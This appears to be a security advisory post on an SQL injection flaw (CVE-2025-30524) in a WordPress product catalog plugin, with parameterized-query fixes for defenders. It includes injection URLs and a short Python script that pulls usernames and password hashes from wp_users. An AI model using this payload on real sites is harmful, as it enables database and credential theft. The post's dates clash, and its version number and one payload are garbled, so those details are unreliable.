In June 2025, a serious security vulnerability (CVE-2025-30524) was discovered in Origincode's Product Catalog plugin, versions up to and including 1..4. If you use this plugin on your website, attackers could gain unauthorized access to your database with a simple trick: SQL Injection.

Let's break down what this means, see the technical details, and understand how hackers might exploit it. We'll also point you to the original resources for more information.

What is SQL Injection?

SQL Injection (SQLi) is a type of vulnerability where an attacker tricks your application into running malicious SQL code. It happens when user inputs are not properly “neutralized” (sanitized/escaped) before being put in SQL statements.

About CVE-2025-30524

Vulnerability: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Affected Product: Origincode Product Catalog
Version: From n/a through 1..4 (all versions up to and including 1..4)
CVE: CVE-2025-30524
Exploitability: Remote, easy to trigger with basic skills

This vulnerability exists because the plugin doesn’t sanitize user input before it’s used in SQL queries.

Imagine the plugin allows users to look up products using a URL like this:

https://yourstore.com/?product_id=123

Inside the code, it might do something like this in PHP:

// $conn is an open mysqli connection; the raw request value is spliced straight into the SQL text
$product_id = $_GET['product_id'];
$query = "SELECT * FROM products WHERE product_id = '$product_id'";
$result = mysqli_query($conn, $query);

Problem:

There’s no check or sanitization on $product_id. An attacker can change the URL and inject SQL:

https://yourstore.com/?product_id=123' OR '1'='1

Now the SQL query looks like this:

SELECT * FROM products WHERE product_id = '123' OR '1'='1'

Because '1'='1' is always true, the WHERE clause matches every row, so the query returns all products and bypasses the intended filter. With more complex injections, attackers could even extract admin passwords.

Malicious Query

https://yourstore.com/?product_id='; UNION SELECT user_login, user_pass FROM wp_users--

Exploit Code Snippet (for educational purposes)

import requests

url = "https://yourstore.com/"
injection = "' UNION SELECT user_login,user_pass FROM wp_users--"
params = {'product_id': injection}  # sent as the product_id query parameter
response = requests.get(url, params=params)
print(response.text)

What Should You Do?

If You Use Origincode Product Catalog:
- Update to the latest, patched version (check Origincode’s site).

If no patch is available, disable the plugin until fixed.

Dev Advice: Always sanitize user input!

Use parameterized queries:

// Prepared statement: the SQL text is fixed and the value is bound separately,
// so quotes in product_id can never change the structure of the query.
$stmt = $conn->prepare("SELECT * FROM products WHERE product_id = ?");
$stmt->bind_param('s', $_GET['product_id']);
$stmt->execute();
$result = $stmt->get_result();
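To see the difference between the concatenated query above and the parameterized one side by side, here is an added, runnable example (not the plugin's code) that uses Python and an in-memory SQLite table in place of PHP and MySQL; the products table and its rows are constructed for the demo. It runs the page's 123' OR '1'='1 payload through both lookup styles:

```python
import sqlite3

# Constructed sample catalog standing in for the plugin's products table.
PRODUCTS = [("123", "Blue Mug"), ("124", "Red Mug"), ("125", "Green Mug")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (product_id TEXT, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return conn


def lookup_vulnerable(conn, product_id):
    # Same pattern as the plugin: the request value becomes part of the SQL text,
    # so a quote in the input closes the literal and the rest is parsed as SQL.
    query = f"SELECT * FROM products WHERE product_id = '{product_id}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, product_id):
    # Placeholder binding: the value travels separately from the SQL text and is
    # compared as data, so quotes and keywords inside it have no SQL meaning.
    return conn.execute(
        "SELECT * FROM products WHERE product_id = ?", (product_id,)
    ).fetchall()


def compare(product_id):
    """Return (rows from concatenated query, rows from parameterized query)."""
    conn = make_db()
    return lookup_vulnerable(conn, product_id), lookup_parameterized(conn, product_id)


if __name__ == "__main__":
    for value in ("123", "123' OR '1'='1"):
        vuln, safe = compare(value)
        print(f"{value!r}: concatenated -> {len(vuln)} rows, parameterized -> {len(safe)} rows")
```

A legitimate id returns one row either way; the injected value returns every row from the concatenated query and no rows from the parameterized one.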

References & Further Reading

- MITRE: CVE-2025-30524
- OWASP SQL Injection Guide
- Origincode Product Catalog Plugin
- WordPress Plugin Directory

Bottom Line

CVE-2025-30524 can let attackers steal your store data, user passwords, and more using a simple URL trick—because special characters in inputs aren't checked. Always keep your plugins updated and never trust user input without checking!

If you’re a site owner, patch or disable the plugin immediately. If you’re a developer, learn from this: parameterize your SQL!

Timeline

Published on: 03/26/2025 15:16:22 UTC
Last modified on: 03/27/2025 16:45:27 UTC